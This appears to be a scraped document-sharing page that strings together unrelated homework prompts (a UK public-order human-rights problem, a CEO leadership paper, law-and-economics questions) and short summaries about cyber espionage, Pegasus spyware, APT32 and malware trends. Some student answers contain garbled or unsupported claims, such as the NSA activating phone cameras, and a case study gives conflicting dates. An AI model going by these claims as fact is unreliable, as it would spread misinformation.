The Chief Constable of Penfield Police, having been informed of the proposed protest is concerned about rumours that a small counter protest has been organised to disrupt the protest by a far right group opposed to human rights. He has issued a Notice to HRUK and Sam Jones under the Public Order Act 1986 which imposes the following conditions on the HRUK demonstration planned for 1
st
May 2014:-
Notice from the Chief Constable of Penfield Police:
1) any demonstration to be held by the HRUK between 1st March 2014 and 1
st
October 2014 should be held in Penfield Country Park, at least 25 miles from Penfield City Centre;
2) the maximum number of demonstrators shall be 25;
3) the maximum duration of the demonstration shall be 2 hours;
4) there should be no public speeches and;
5) that in the event of any counter demonstration or hostility shown towards HRUK members, the Penfield Police reserve the right to cancel the demonstration immediately
Advise, giving reasons, whether Sam Jones and/or HRUK can use the Human Rights Act 1998 to challenge the decision of the Chief Constable.
.
Leadership Style What do people do when they are leadingAssignme.docxfestockton
Leadership Style: What do people do when they are leading?
Assignment: Leadership Style: What Do People Do When They Are Leading?
Due Week 9 and worth 100 points
Choose one (1) of the following CEOs for this assignment: Ursula Burns (Xerox). Use the Internet to investigate the leadership style and effectiveness of the selected CEO.
Write a five to six (5-6) page paper in which you:
Provide a brief (one [1] paragraph) background of the CEO.
Analyze the CEO’s leadership style and philosophy, and how the CEO’s leadership style aligns with the culture.
Examine the CEO’s personal and organizational values.
Evaluate how the values of the CEO are likely to influence ethical behavior within the organization.
Determine the CEO’s three (3) greatest strengths and three (3) greatest weaknesses.
Select the quality that you believe contributes most to this leader’s success. Support your reasoning.
Assess how communication and collaboration, and power and politics influence group (i.e., the organization’s) dynamics.
Use at least five (5) quality academic resources in this assignment. Note: Wikipedia and other Websites do not qualify as academic resources.
Your assignment must follow these formatting requirements:
Be typed, double spaced, using Times New Roman font (size 12), with one-inch margins on all sides; citations and references must follow APA or school-specific format. Check with your professor for any additional instructions.
Include a cover page containing the title of the assignment, the student’s name, the professor’s name, the course title, and the date. The cover page and the reference page are not included in the required assignment page length.
The specific course learning outcomes associated with this assignment are:
Analyze the formation and dynamics of group behavior and work teams, including the application of power in groups.
Outline various individual and group decision-making processes and key factors affecting these processes.
Examine the primary conflict levels within organization and the process for negotiating resolutions.
Examine how power and influence empower and affect office politics, political interpretations, and political behavior.
Use technology and information resources to research issues in organizational behavior.
Write clearly and concisely about organizational behavior using proper writing me
.
More Related Content
Similar to APT28 A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS.docx
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It is marketed for surveillance of serious crimes and terrorism but was found on a leaked list of 50,000 phone numbers belonging to journalists, politicians, activists and others. The Pegasus Project investigation revealed how governments have used the spyware to spy on these groups. NSO claims their technology helps governments fight crime and terrorism.
4. Search the Web for uses of Big Data in homeland security. Specifi.pdfsktambifortune
4. Search the Web for uses of Big Data in homeland security. Specifically, read about the spying
by the U.S. National Security Agency (NSA). What role did technology and Big Data play in this
questionable practice?
Solution
Homeland Security Research Corp. forecast that the big data and data analytics in Homeland
Security and Public Safety market will be spear headed by rapid growth in Asia Pacific and
Europe, with CAGR in the low 20s for both regions, especially due to the Chinese and Western
European homeland security and public safety markets.
The U.S. National Security Agency spying on the all over world by analyzing the data i.e the
data it may come from social media or from any company. The NSA spy on all accounts as many
ways its possible. Recently Snow den that he reveal the information regarding the NSA’s secret
operations.
He mentioned that NSA developed a separate search engine type algorithm that it displays the
every possible key of the given query. Through these available data they analyzed the suspect.
And also through these search engine they directly connect our personal devices without our
permission.
The main Example is they connect with our personal smart phone without our permission they
activate our phone camera and watch what we are doing there. These mainly disturb our personal
life..
Albert Helps Protect from Hacking JRN 4.docxnettletondevon
Albert Helps Protect from Hacking
JRN 497 Journalism and Mass Communication Capstone
Ceiara Culver
August 18, 2018
Voter security has increased as people get ready for the 2018 midterm elections. Many
states have decided to install cyber-intrusion systems supplied by Homeland Security.
Government officials have created these systems to prevent hacking during the 2018 mid-term
elections by foreign countries. This comes in response to the 2016 presidential election where
there were cyber-attacks from Russia (Snow, 2016).
The system that was developed is called Albert. It is similar to
another program called Einstein, which is another Homeland
Security program that is an intrusion detection system. Albert is the
updated version of this that helps to detect viruses and malicious malware that can affect
computers and software. The centers send information through a network that detects if there is
malicious software, if there is the center gives out an alert to be analyzed by security operations
(dhs, 2018). According to one government official, the program is a success and it has helped
to track many cyber threats. Albert has already detected 50,000
notices of malicious activity. Another person says that Albert may
not be a good idea because of the problem with not knowing if the
program is detecting malicious software from foreign countries or if
they are tracking people from within the United States. And that the
program tracks people from their cellphones and giving away their control. There are also some
states that have not decided to go with Albert but with other programs (Marquardt, 2018).
Albert has initiated a lot of mixed feelings in some people. There are those that work
for the suppliers of the system that believe it works great and helps protect against hacking
from foreign countries like Russia during the 2016 presidential election and those that believe
that Albert is a way to give up control and can be getting information from united states
citizens instead of foreign countries.
Resource
Marquardt, A. (2018, August 17). States add intrusion sensors to election systems to thwart
hacking. Retrieved from https://www.cnn.com/2018/08/17/politics/states-
intrustionsensors-election-systems/index.html
Snow, J. Einstein's little bro: Used by most states, Albert guards against malware. (2016,
December 27). Retrieved from https://www.fedscoop.com/ms-isac-einstein-inspired-
program-almost- used-by-every-state/
EINSTEIN. (2018, May 17). Retrieved from https://www.dhs.gov/einstein
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-systems/index.html
https://www.cnn.com/2018/08/17/politics/states-intrustion-sensors-election-s.
This paper presents a framework to automatically detect disinformation campaigns on social media. The framework integrates natural language processing, machine learning, graph analysis, and causal inference. It collects social media posts, identifies narratives, classifies accounts as real or influence operations, maps the network of accounts spreading each narrative, and estimates the causal impact of each account in spreading the narrative. The framework was tested on real Twitter data from the 2017 French election and detected influence operation accounts with 96% precision and 79% recall. It also identified communities and high impact accounts that were corroborated by other sources.
This document discusses cyber crime and cyber security. It begins by defining cyber security as technologies and processes designed to protect computers and data from unauthorized access. Cyber crime is defined as illegal activities committed using computers or networks. The document then provides statistics on cyber crimes in India by state, with the highest rates in Maharashtra and Uttar Pradesh. It also ranks the top countries for cyber crimes in 2016, with the US ranked first and Vietnam ranked last. China is identified as the top hacking country in 2016. The most common type of cyber attack is viruses, while financial fraud is the least common. The document concludes by providing tips for protecting against cyber crimes such as using firewalls and strong passwords.
On How the Darknet and its Access to SCADA is a Threat to National Critical I...Matthew Kurnava
This document analyzes how the darknet poses a threat to national critical infrastructure. It begins with an introduction that defines the darknet and describes some of the illegal activities that occur there. The research question asks how the darknet threatens critical infrastructure and how vulnerable different sectors are. The hypothesis is that the darknet poses a primary threat to US cyber critical infrastructure due to criminal, hacktivist, and terrorist use that could significantly damage health and welfare. A literature review discusses research on darknet cyber attacks, hacktivist and terrorist groups using the darknet, and critical infrastructure's growing dependency on technology and vulnerability. The methodology will use an analytical approach to examine threats to each of the 16 US critical infrastructure sectors.
Case Study - Cyberterrorism—A New RealityWhen hackers claiming .docxcowinhelen
Case Study - Cyberterrorism—A New Reality:
When hackers claiming to support the Syrian regime of Bashar Al-Assad attacked and disabled the website of Al Jazeera, the Qatar-based satellite news channel, in September 2012, the act was another act of hacktivism, purporting to promote a specific political agenda over another. Hacktivism has become a very visible form of expressing dissent. Even though there have been numerous incidents reported by the media, the first case of hacktivism was documented in 1989 when a member of the Cult of the Dead Cow hacker collective named Omega coined the term in 1996. However, hacktivism is not the only form of cyber protest and conflict that has everyone from ICT professionals to governments scrambling for solutions. Individuals, enterprises, and governments alike rely in many instances almost completely on network computing technologies, including cloud computing. The international and ever-evolving nature of the Internet along with inadequate law enforcement and the anonymity the global architecture offers creates opportunities for hackers to attack vulnerable nodes for personal, financial, or political gain.
The Internet is also rapidly becoming the political and advocacy platform of choice, bringing with it both positive and negative consequences. Increasingly sophisticated off-the-shelf technologies and easy access to the Internet are significantly increasing incidents of cyberterrorism, netwars, and cyberwarfare. The following are a few examples.
• According to The Israel Electric Company, Israel is attacked 1,000 times a minute by cyberterrorists targeting the country’s infrastructure—water, electricity, communications, and other services.• The New York Times, quoting military officials, said there was a seventeen-fold increase in cyberattacks targeting the US critical infrastructure between 2009 and 2011.• The 2010 Data Breach Investigations Report has data recording more than 900 instances of computer hacking and other data breaches in the past seven years, resulting in some 900 million compromised records. In 2012, the same study listed 855 breaches, resulting in 174 million compromised records in 2011 alone, up from 4 million in 2010.• Another study of 49 breaches in 2011 reported that the average organizational cost of a data breach (including detection, internal response, notification, post notification cost) was $5.5 million. This number was down from $7.2 million in 2010.14 The Telegraph (London) reported that “India blamed a new ‘cyber-jihad’ by Pakistani militant groups for the exodus of thousands of people from India’s north-eastern minorities from its main southern cities in August after text messages warning them to flee went viral.”
There have been recorded instances of nations allegedly engaging in cyberwarfare. The Center for the Study of Technology and Society has identified five methods by which cyberwarfare can be used as a means of military action. These include defacing or di.
This document is a report from Comodo Threat Research Labs summarizing malware trends in 2017. It finds that trojans were the most common malware type, making up 41% of detections, followed by applications at 24.7% and backdoors at 10.1%. Russia and the US had the most malware detections. The report analyzes trends in specific malware types like trojans, applications, backdoors, and worms. It also examines detections by country and region. Comodo predicts backdoor detections will continue rising in Q1 2018 based on a rise seen in Q4 2017.
TOTEM: Threat Observation, Tracking, and Evaluation ModelJohn Gerber
Merriam-Webster defines a totem as any supposed entity that watches over or assists a group of people, such as a family, clan, or tribe. In this presentation I will focus on how TOTEM assists in watching over and evaluating the threat an IP represents. The idea behind TOTEM is simple: compare threat information from sources such as watchlists (DShield, Emerging Threats, SenderBase, etc.) to activities with the organization (IDS/IPS, flow logs, etc.) and other locations (SANS ISC, DOE federated model, etc.). As new threat information and activity sources are added, a better evaluation can be rendered.
Project 4 Threat Analysis and ExploitationTranscript (backgroun.docxstilliegeorgiana
Project 4: Threat Analysis and Exploitation
Transcript (background):
You are part of a collaborative team that was created to address cyber threats and exploitation of US financial systems critical infrastructure. Your team has been assembled by the White House Cyber National security staff to provide situational awareness about a current network breach and cyber attack against several financial service institutions. Your team consists of four roles, a representative from the financial services sector who has discovered the network breach and the cyber attacks. These attacks include distributed denial of service attacks, DDOS, web defacements, sensitive data exfiltration, and other attack vectors typical of this nation state actor. A representative from law enforcement who has provided additional evidence of network attacks found using network defense tools. A representative from the intelligence agency who has identified the nation state actor from numerous public and government provided threat intelligence reports. This representative will provide threat intelligence on the tools, techniques, and procedures of this nation state actor. A representative from the Department of Homeland Security who will provide the risk, response, and recovery actions taken as a result of this cyber threat. Your team will have to provide education and security awareness to the financial services sector about the threats, vulnerabilities, risks, and risk mitigation and remediation procedures to be implemented to maintain a robust security posture. Finally, your team will take the lessons learned from this cyber incident and share that knowledge with the rest of the cyber threat analysis community. At the end of the response to this cyber incident, your team will provide two deliverables, a situational analysis report, or SAR, to the White House Cyber National security staff and an After Action Report and lesson learned to the cyber threat analyst community.
Step 2: Assessing Suspicious Activity
Your team is assembled and you have a plan. It's time to get to work. You have a suite of tools at your disposal from your work in Project 1, Project 2, and Project 3, which can be used together to create a full common operating picture of the cyber threats and vulnerabilities that are facing the US critical infrastructure.
To be completed by all team members: Leverage the network security skills of using port scans, network scanning tools, and analyzing Wireshark files, to assess any suspicious network activity and network vulnerabilities.
Step 3: The Financial Sector
To be completed by the Financial Services Representative: Provide a description of the impact the threat would have on the financial services sector. These impact statements can include the loss of control of the systems, the loss of data integrity or confidentiality, exfiltration of data, or something else. Also provide impact assessments as a result of this security incident to the financial ...
This document proposes five core primitives that are building blocks for Networks of 'Things' (NoTs), including the Internet of Things (IoT):
1) Sensors - which measure physical properties and output data
2) Aggregators - which collect and process data from multiple sensors
3) Communication channels - which allow for data transfer between primitives
4) External utilities (eUtilities) - which are entities outside the NoT that can input or output data
5) Decision triggers - which initiate actions based on aggregated data
These primitives provide a framework for analyzing reliability, security, and trust in NoTs.
7122017 cyber espionage is alive and well apt32 and the thrsmile790243
FireEye analyzed cyber espionage activities of APT32, a threat group believed to be operating out of Vietnam. APT32 has targeted private companies with business interests in Vietnam as well as foreign governments and dissidents since at least 2014. APT32 uses phishing emails with malicious attachments or links to infect victims and install backdoors on their systems. These backdoors include unique malware families as well as commercially available tools and communicate with command and control servers controlled by APT32. FireEye investigated multiple intrusions attributed to APT32 and outlined their targeting and sophisticated tactics.
Pegasus is spyware developed by NSO Group that can covertly install on iOS and Android phones. It provides full access to a targeted phone's data, communications, and sensors. An investigation revealed that governments used Pegasus to spy on journalists, politicians, activists and others. Over 50,000 phone numbers on a leaked list were analyzed, with many showing forensic evidence of Pegasus infection, indicating illegal surveillance. In India, it was alleged that the government used Pegasus to spy on WhatsApp messages of activists and politicians, and numbers linked to a Supreme Court case accusing the former Chief Justice of sexual harassment were also reportedly targeted.
Similar to APT28 A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS.docx (14)
Learning ResourcesRequired ReadingsToseland, R. W., & Ri.docxfestockton
Learning Resources
Required Readings
Toseland, R. W., & Rivas, R. F. (2017).
An introduction to group work practice
(8th ed.). Boston, MA: Pearson.
Chapter 11, “Task Groups: Foundation Methods” (pp. 336-363)
Chapter 12, “Task Groups: Specialized Methods” (pp. 364–395)
Van Velsor, P. (2009). Task groups in the school setting: Promoting children’s social and emotional learning.
Journal for Specialists in Group Work
,
34
(3), 276–292.
Document:
Group Wiki Project Guidelines (PDF)
Recommended Resources
Holosko, M. J., Dulmus, C. N., & Sowers, K. M. (2013). Social work practice with individuals and families: Evidence-informed assessments and interventions. Hoboken, NJ: John Wiley & Sons, Inc.
Chapter 1 “Assessment of Children”
Chapter 2 “Intervention with Children”
Discussion: Task Groups
Group work is a commonly used method within school settings. Because peer interaction is important in the emotional and social development of children, the task group can serve as a wonderful therapeutic setting and tool; however, many factors should be considered when implementing this type of intervention.
For this Discussion, read the Van Velsor (2009) article.
By Day 3
Post
your understanding of task groups as an intervention for children. Use the model for effective problem solving to compare and contrast (how to identify the problem, develop goals, collect data). How does this model differ from a traditional treatment group? What are the advantages and possible disadvantages of this model? Describe how you might use this model for adults. What populations would most benefit from this model?
.
LeamosEscribamos Completa el párrafo con las formas correctas de lo.docxfestockton
Leamos/Escribamos Completa el párrafo con las formas correctas de los verbos en paréntesis. Usa el pretérito o el imperfecto.
Yo __1__ (criarse) en el campo, pero mi familia __2__
(mudarse) a la ciudad cuando yo tenía doce años. Hablábamos
aymara en mi pueblo, y mi mamá no __3__ (expresarse) bien en
español. Mis hermanos y yo __4__ (comunicarse) sin problema
porque habíamos estudiado español en el colegio. Con dificultad
nosotros __5__ (acostumbrarse) al estilo de vida.Yo __6__
(preocuparse) por todo. No me __7__ (gustar) el ruido de los
carros. Pero poco a poco, nostros __8__ (asimilar) el modo de
ser de la gente de la cuidad.Yo __9__ (graduarse) de la
universidad hace poco, mi hermano mayor ahora es arquitecto, y
mi hermano menor __10__ (casarse) el mes pasado.
.
Leadership via vision is necessary for success. Discuss in detail .docxfestockton
Leadership via "vision" is necessary for success. Discuss in detail the qualities that a leader must exhibit in order to be considered visionary and, further, how these qualities may be learned and developed. Provide research and share insight on the determination of a specific leadership theory associated with leadership via vision. Cite your posting in proper APA format and ensure that your posting provides a minimum of 5 paragraphs.
.
Learning about Language by Observing and ListeningThe real.docxfestockton
Learning about Language by Observing and Listening
The real voyage of discovery consists not in seeking
new landscapes, but in having new eyes. Marcel Proust
The UCSD experience encompasses academic as well as social learning. Therefore, we learn not only from our courses, but from the people we meet on campus and the experiences we have with them. Life is a journey of self-discovery. As individuals, we are constantly seeking to determine who we are and where we belong in the world. Throughout this process, language is both a bridge and a barrier to communication and human growth.
The general subject matter for this essay is language or language communities. The source of your information will be what you observe and hear by listening to others. The goal is to do a project based on what our own minds can comprehend from diligent observation, note-taking, and reasoning. You should arrive at a reasoned (not emotional) conclusion. The conclusion/result of your experiment is your thesis and should be presented in the opening paragraph in one sentence. Secondary material should not be brought into this essay. Thus, this is not an essay that needs to be the result of academic texts or online sources. The research is what you see and how you interpret what you see and hear. It will be up to you to determine what particular focus your essay will take and wahat meaning you wish to convey to your reader. Do the exploratory writing activities on pages 73-76. These activities will guide you through an analysis of some of the reflections you completed in the first part of your book. Once you determine your focus, you will use the information you have already gathered and additional information you will research to clarify your ideas and provide evidence for the points you wish to make.
If you prefer a more direct prompt, the suggested topics listed below might be helpful to you. Choose one of the following topics to establish a focus and direction.
1) From your observations and conversations, what assumptions and stereotypes do we make about people based on language and behavior? What did you learn from the experiment?
2) You may examine body language as well as verbal language. Explore nonverbal communication in a group. What conclusions can you come to regarding the group based on nonverbal behavior?
3) Did you observe language differences between men and women here at UCSD Notice the ways in which men and women treat one another. Observe the language you hear on campus.
How do women greet one another? How do men greet each other? Do not just note the similarities or differences. Explain and interpret the information.
4) Observe and identify a code language on campus, on your job, or in your personal arena. How is language used? Is it effective? Analyze.
5) Have you become keenly aware of code switching? Who utilizes this language? In your observations and conversations, did you find code switching to be an acceptable form of lang.
Learning Accomplishment Profile-Diagnostic Spanish Language Edit.docxfestockton
Learning Accomplishment Profile-Diagnostic Spanish Language Edition
The Ages and Stages Questionnaires-Social Emotional (ASQ-SE)
Learning Accomplishment Profile-3 (LAP-3)
Mullen Scales of Early Learning
Purpose of the screening-what can an early childhood professional do with the results? What should happen next?
.
Learning about Language by Observing and ListeningThe real voy.docxfestockton
Learning about Language by Observing and Listening
The real voyage of discovery consists not in seeking
new landscapes, but in having new eyes. Marcel Proust
The UCSD experience encompasses academic as well as social learning. Therefore, we learn not only from our courses, but from the people we meet on campus and the experiences we have with them. Life is a journey of self-discovery. As individuals, we are constantly seeking to determine who we are and where we belong in the world. Throughout this process, language is both a bridge and a barrier to communication and human growth.
The general subject matter for this essay is language or language communities. The source of your information will be what you observe and hear by listening to others. The goal is to do a project based on what our own minds can comprehend from diligent observation, note-taking, and reasoning. You should arrive at a reasoned (not emotional) conclusion. The conclusion/result of your experiment is your thesis and should be presented in the opening paragraph in one sentence. Secondary material should not be brought into this essay. Thus, this is not an essay that needs to be the result of academic texts or online sources. The research is what you see and how you interpret what you see and hear. It will be up to you to determine what particular focus your essay will take and wahat meaning you wish to convey to your reader. Do the exploratory writing activities on pages 73-76. These activities will guide you through an analysis of some of the reflections you completed in the first part of your book. Once you determine your focus, you will use the information you have already gathered and additional information you will research to clarify your ideas and provide evidence for the points you wish to make.
If you prefer a more direct prompt, the suggested topics listed below might be helpful to you. Choose one of the following topics to establish a focus and direction.
1) From your observations and conversations, what assumptions and stereotypes do we make about people based on language and behavior? What did you learn from the experiment?
2) You may examine body language as well as verbal language. Explore nonverbal communication in a group. What conclusions can you come to regarding the group based on nonverbal behavior?
3) Did you observe language differences between men and women here at UCSD Notice the ways in which men and women treat one another. Observe the language you hear on campus.
How do women greet one another? How do men greet each other? Do not just note the similarities or differences. Explain and interpret the information.
4) Observe and identify a code language on campus, on your job, or in your personal arena. How is language used? Is it effective? Analyze.
5) Have you become keenly aware of code switching? Who utilizes this language? In your observations and conversations, did you find code switching to be an accepta.
LEARNING OUTCOMES1. Have knowledge and understanding of the pri.docxfestockton
LEARNING OUTCOMES:
1. Have knowledge and understanding of the principles of Constitutional and Administrative Law, and of the way in which these principles have developed.
2. Deal with issues relating to Constitutional and Administrative Law both systematically and creatively, recognising potential alternative conclusions for particular situations and providing supporting reasons for such conclusions.
3. Demonstrate self-direction and originality in tackling and solving problems relating to Constitutional and Administrative Law.
4. Research primary and secondary sources of Constitutional and Administrative Law.
5. Communicate thoughts and ideas in writing and/or orally, using the English language and legal terminology with care, clarity and accuracy.
6. Manage time effectively.
QUESTION:
A recently elected Government, concerned about rising gun crime by drug dealers, has introduced a Bill into Parliament to bring back the death penalty for any person convicted of causing death by the use of a firearm and which is also related to an illegal drug trade.
Human Rights UK (HRUK), part of a worldwide protest organisation called ‘Global Human Rights’ is opposed to the death penalty in any circumstances. HRUK has many thousands of members across the UK. The organisation is split into county groups and there is a thriving branch of over 1200 members in Penfield.
Sam Jones, the leader of the Penfield branch, has proposed a local demonstration against the Bill to take place on the 1
st
May 2014. The demonstration includes a march from the Town Hall in Penfield City Centre to the local War Memorial followed by speeches from senior members of the organisation.
The Chief Constable of Penfield Police, having been informed of the proposed protest is concerned about rumours that a small counter protest has been organised to disrupt the protest by a far right group opposed to human rights. He has issued a Notice to HRUK and Sam Jones under the Public Order Act 1986 which imposes the following conditions on the HRUK demonstration planned for 1
st
May 2014:-
Notice from the Chief Constable of Penfield Police:
1) any demonstration to be held by the HRUK between 1st March 2014 and 1
st
October 2014 should be held in Penfield Country Park, at least 25 miles from Penfield City Centre;
2) the maximum number of demonstrators shall be 25;
3) the maximum duration of the demonstration shall be 2 hours;
4) there should be no public speeches and;
5) that in the event of any counter demonstration or hostility shown towards HRUK members, the Penfield Police reserve the right to cancel the demonstration immediately
Advise, giving reasons, whether Sam Jones and/or HRUK can use the Human Rights Act 1998 to challenge the decision of the Chief Constable.
.
Leadership Style What do people do when they are leadingAssignme.docxfestockton
Leadership Style: What do people do when they are leading?
Assignment: Leadership Style: What Do People Do When They Are Leading?
Due Week 9 and worth 100 points
Choose one (1) of the following CEOs for this assignment: Ursula Burns (Xerox). Use the Internet to investigate the leadership style and effectiveness of the selected CEO.
Write a five to six (5-6) page paper in which you:
Provide a brief (one [1] paragraph) background of the CEO.
Analyze the CEO’s leadership style and philosophy, and how the CEO’s leadership style aligns with the culture.
Examine the CEO’s personal and organizational values.
Evaluate how the values of the CEO are likely to influence ethical behavior within the organization.
Determine the CEO’s three (3) greatest strengths and three (3) greatest weaknesses.
Select the quality that you believe contributes most to this leader’s success. Support your reasoning.
Assess how communication and collaboration, and power and politics influence group (i.e., the organization’s) dynamics.
Use at least five (5) quality academic resources in this assignment. Note: Wikipedia and other Websites do not qualify as academic resources.
Your assignment must follow these formatting requirements:
Be typed, double spaced, using Times New Roman font (size 12), with one-inch margins on all sides; citations and references must follow APA or school-specific format. Check with your professor for any additional instructions.
Include a cover page containing the title of the assignment, the student’s name, the professor’s name, the course title, and the date. The cover page and the reference page are not included in the required assignment page length.
The specific course learning outcomes associated with this assignment are:
Analyze the formation and dynamics of group behavior and work teams, including the application of power in groups.
Outline various individual and group decision-making processes and key factors affecting these processes.
Examine the primary conflict levels within organization and the process for negotiating resolutions.
Examine how power and influence empower and affect office politics, political interpretations, and political behavior.
Use technology and information resources to research issues in organizational behavior.
Write clearly and concisely about organizational behavior using proper writing me
.
Leadership Throughout HistoryHistory is filled with tales of leade.docxfestockton
Leadership Throughout History
History is filled with tales of leaders who were brave, selfless, and achieved glorious accomplishments. Your text discusses how leadership theory has been categorized throughout time, from the culture of ancient Egypt thousands of years ago, to the “toolbox” style of today.
The first category, known as the “Great Man” phase, focused on the traits that make an effective leader. This period ranges from circa 450 B.C. to the 1940s, and includes classic examples such as the aforementioned Egyptian period and the expansive influence of the Roman Empire.
The second category, known as the Behavior phase, spanned the 1940s to the 1960s, and focused on determining the types of behavior that leaders utilized to influence and affect others.
The final category is the Situational phase. This line of research began in the 1970s and is still present today. It suggests that leaders have a broad understanding of the various types of leadership styles, and can choose the appropriate one to handle a given situation.
I
n this Journal, discuss each phase, do research and provide examples of influential leaders from each phase, and explain how and why they were so influential.
Your Journal entry should be at least 500 words, and cite appropriate references in APA format.
.
Lean Inventory Management1. Why do you think lean inventory manage.docxfestockton
Lean Inventory Management
1. Why do you think lean inventory management can decrease transportation, capital expenses, and inventory storage?
2. List some products in your personal or family "inventory." How do you manage them? (For instance, do you constantly run to the store for milk? Do you throw out a lot of milk because of spoilage?) How can lean inventory change your way of managing these SKUs?
3. Identify a goods-producing or service-providing organization and discuss how it might make aggregate planning decisions.
4. Provide an argument for or against adopting a chase strategy for a major airline call center.
.
Leadership varies widely by culture and personality. An internationa.docxfestockton
Leadership varies widely by culture and personality. An international organization with locations in several countries must balance the local customs and cultures with those of the primary culture of the organizations’ headquarters. Using the Germany as the headquarters of an international Internet retail organization serving the USA and Canada research and discuss the differences that leaders would have to navigate in approach and adapting to different standards of behavior and culture within the countries.
.
Leadership is the ability to influence people toward the attainment .docxfestockton
Leadership is the ability to influence people toward the attainment of goals. The changing of the environment in which most organizations are operating has significantly influenced leadership systems in recent years, and has contributed to a shift in how we think about and practice leadership.
Analyze how leadership is changing in today’s organizations, including Level 5 leadership, servant leadership, and transformational leadership. Please discuss in 200-250 words.
.
Lawday. Court of Brightwaltham holden on Monday next after Ascension.docxfestockton
Lawday. Court of Brightwaltham holden on Monday next after Ascension Day in the twenty-first year of King Edward (A.D. 1293).
The tithingman of Conholt with his whole tithing present that all is well save that William of Mescombe has stopped up a . . . [the word is indecipherable in the manuscript, but Maitland thinks it is a watercourse] wrongfully. Therefore he is in mercy (12 d.). Also they say that Edith of Upton has cut down trees in the enclosure and the seisin of the lord contrary to a prohibition, and they say that she has no property and has fled into foreign parts, (amercement, 12 d.).
Adam Scot is made tithingman and sworn to a faithful exercise of his office.
John son of Hugh Poleyn enters on the land which Randolph Tailor held saving the right of everyone and gives for entry-money 4 marks and will pay 1 mark at Michaelmas in the twenty-second year of King Edward, 1 mark at Christmas next following, 1 mark at Easter, and 1 mark at Michaelmas next following, and for the due making of all these payments the said Hugh Poleyn finds sureties, to wit, Adam Scot, John Gosselyn, William of Mescombe, John Gyote. And because the said John is a minor the wardship of the said lands and tenements is delivered to his father the said Hugh Poleyn until he be of full age, on the terms of his performing the services due and accustomed for the same. Also there is granted to the said Hugh the crop now growing on the sown land, and the heriot due on this entry, for a half-mark payable at Michaelmas next on the security of the above-named sureties.
(a) Hugh Poleyn gives the lord 2 s. that he may have the judgment of the court as to his right in a certain tenement in Upton which J. son of Randolph Tailor claims as his right. And upon this the whole township of Brightwaltham sworn along with the whole township of Conholt say upon their oath that Hugh Poleyn has better right to hold the said tenement than anyone else has, and that he is the next heir by right of blood.
(The Conholt case as to the tenure of Edith wife of Robert Tailor according to the inquest made by the jurors. One Alan Poleyn held a tenement in Conholt upon servile terms and had a wife Cristina by name. The said Alan died when Richard was the farmer [of the manor]. Thereupon came the friends of the said Cristina and procured for her a part of the land by way of dower making a false suggestion and as though [the land] were of free condition, and this was to the great prejudice of the lord Abbot. Upon this came one Richard Aleyn and espoused the said Cristina and begot upon her one Randolph. Then Richard died, and the said Cristina of her own motion enfeoffed Randolph her son of the said tenement. Then Cristina died, and Randolph being in seisin of the said tenement espoused Edith the present demanding; and after Randolph's death Edith married Robert Tailor. Now you can see and give your counsel about the right of the said Edith. And know this, that if I had at hand the court-rolls of the.
Leaders face many hurdles when leading in multiple countries. There .docxfestockton
Leaders face many hurdles when leading in multiple countries. There are several examples of disastrous public relations fallout that have occurred when companies have outsourced work to other nations. When determining where to move offshore as a company, the leaders of the organization must make several decisions.
Using course theories and current multinational organizations that have locations in several countries, convey your own thoughts on the subject and address the following:
What leadership considerations must an organization weigh in selecting another country to open a location such as a manufacturing plant?
How might leaders need to change leadership styles to manage multinational locations?
What public relations issues might arise from such a decision?
How would you recommend such a company to demonstrate their social responsibility to their headquarters country as well as any offshore locations?
.
Last year Angelina Jolie had a double mastectomy because of re.docxfestockton
Last year Angelina Jolie had a double mastectomy because of results from a genetic test. Describe the science of the test and the reason for her decision. Do you agree with her choice, and do you agree with her decision to go public about her choice?
1 page essay with at least 1 reference
.
Leaders face many hurdles when leading in multiple countries. Ther.docxfestockton
Leaders face many hurdles when leading in multiple countries. There are several examples of disastrous public relations fallout that have occurred when companies have outsourced work to other nations. When determining where to move offshore as a company, the leaders of the organization must make several decisions.
Using course theories and current multinational organizations that have locations in several countries, convey your own thoughts on the subject and address the following:
What leadership considerations must an organization weigh in selecting another country to open a location such as a manufacturing plant?
How might leaders need to change leadership styles to manage multinational locations?
What public relations issues might arise from such a decision?
How would you recommend such a company to demonstrate their social responsibility to their headquarters country as well as any offshore locations?
Please submit your assignment.
This assignment will be assessed using the rubric provided
here
.
For assistance with your assignment, please use your text, Web resources, and all course materials.
.
Leaders today must be able to create a compelling vision for the org.docxfestockton
Leaders today must be able to create a compelling vision for the organization. They also must be able to create an aligned strategy and then execute it. Visions have two parts, the envisioned future and the core values that support that vision of the future. The ability to create a compelling vision is the primary distinction between leadership and management. Leaders need to create a vision that will frame the decisions and behavior of the organization and keep it focused on the future while also delivering on the short-term goals.
Respond to the following:
Assess your current leaders. These leaders could be those at your current or previous organizations or your educational institutions.
How effective are they at creating and communicating the organization vision?
How effective are they at developing a strategy and communicating it throughout the organization?
How effective are they at upholding the values of the organization?
Support your positions with specific examples or by citing credible sources.
.
Law enforcement professionals and investigators use digital fore.docxfestockton
Law enforcement professionals and investigators use digital forensic methods to solve crimes every day. Locate one current news article that explains how investigators may have used these techniques to solve a crime. Explain the crime that was solved, and the methods used to determine how the crime was committed. Some examples of crimes solved may include locating missing children, finding criminals who have fled the scene of a crime, or unsolved crimes from the past that have been solved due to the use of new techniques (such as DNA testing).
Your written assignment should be 3-4 paragraphs in your own words and should include a reference citation for your source of information.
.
LAW and Economics 4 questionsLaw And EconomicsTextsCoote.docxfestockton
LAW and Economics 4 questions
Law And Economics
Texts
Cooter, Robert and Thomas Ulen. 2011. Law and Economics. Sixth Edition. Boston: Pearson Addison Wesley
(Chapter 1-4)
Polinksky, A. Mitchell. 2011. An Introduction to Law and Economics. Fourth Edition. New York: Aspen Publishers.
(Chapters 1-2)
Posner, Richard A. 2007. Economic Analysis of Law. Seventh Edition. Boston: Little, Brown and Company.
(Chapter 1)
2.) Discuss the adverse impacts of monopoly upon market outcomes. Discuss the impact of government’s monopoly power over coercion.
6.) Suppose the local government determines that the price of food is too high and imposes a ceiling on the market price of food that is below the equilibrium price in that locality. Predict some of the consequences of the ceiling.
10.) Consider the right to smoke or to be free from smoke in the following situations:
1. smoking in a public area.
2. smoking in hotel rooms.
3. smoking in a private residence.
4. smoking on commercial airline flights.
